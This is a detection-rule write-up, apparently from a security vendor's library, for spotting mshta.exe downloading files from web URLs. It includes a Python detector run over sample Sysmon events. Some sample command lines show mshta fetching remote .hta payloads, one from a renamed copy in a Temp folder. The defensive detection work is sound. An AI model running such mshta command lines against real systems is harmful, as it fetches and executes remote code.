
mshta.exe File Download

Anvilogic Forge

Summary
This detection rule focuses on the execution of `mshta.exe`, a Windows utility that threat actors often abuse to download files from web URLs passed in its command-line arguments. By monitoring process telemetry for this activity, the rule aims to identify unauthorized downloads that may indicate command-and-control (C2) communication or other malicious activity. The logic is built for the Splunk platform and relies on Sysmon events for endpoint data collection. It captures events where `mshta.exe` is executed with a URL pattern in its command line and categorizes them for further analysis.
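The core of the detection described above, written here as an added Python example that is not the Anvilogic rule or its Splunk search. It runs over constructed Sysmon-style process-creation records (Event ID 1, placeholder hosts and paths) and goes one step beyond the summary by also matching on the PE's OriginalFileName, so a renamed copy of mshta.exe is still flagged.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records (Event ID 1). Hosts, paths
# and parent processes are placeholders, not telemetry from any real incident.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://203.0.113.10/update.hta',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 1, "Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"svchost.exe https://example.net/stage2.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\alice\Documents\form.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe http://example.org/readme.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Web URL anywhere in the command line; quotes and whitespace end the match.
URL_RE = re.compile(r"""\b(?:https?|ftp)://[^\s"']+""", re.IGNORECASE)


def is_mshta(event):
    """Match on the on-disk image name or the PE's OriginalFileName (Sysmon 10+),
    so a renamed copy of mshta.exe does not slip past the image-name check."""
    image_name = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    return image_name == "mshta.exe" or original == "mshta.exe"


def detect(events):
    """Return one finding per process-creation event where mshta.exe carries a URL."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1 or not is_mshta(ev):
            continue
        match = URL_RE.search(ev.get("CommandLine", ""))
        if not match:
            continue  # local .hta file: outside this rule's scope
        findings.append({
            "image": ev["Image"],
            "parent": ev.get("ParentImage", ""),
            "url": match.group(0),
            "techniques": ["T1105", "T1218.005"],
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['image']} <- {f['parent']}: {f['url']} {f['techniques']}")
```

Only the two events with a web URL are reported; the locally sourced .hta and the non-mshta process are left alone.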
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
  • Windows Registry
ATT&CK Techniques
  • T1105
  • T1218.005
Created: 2024-02-09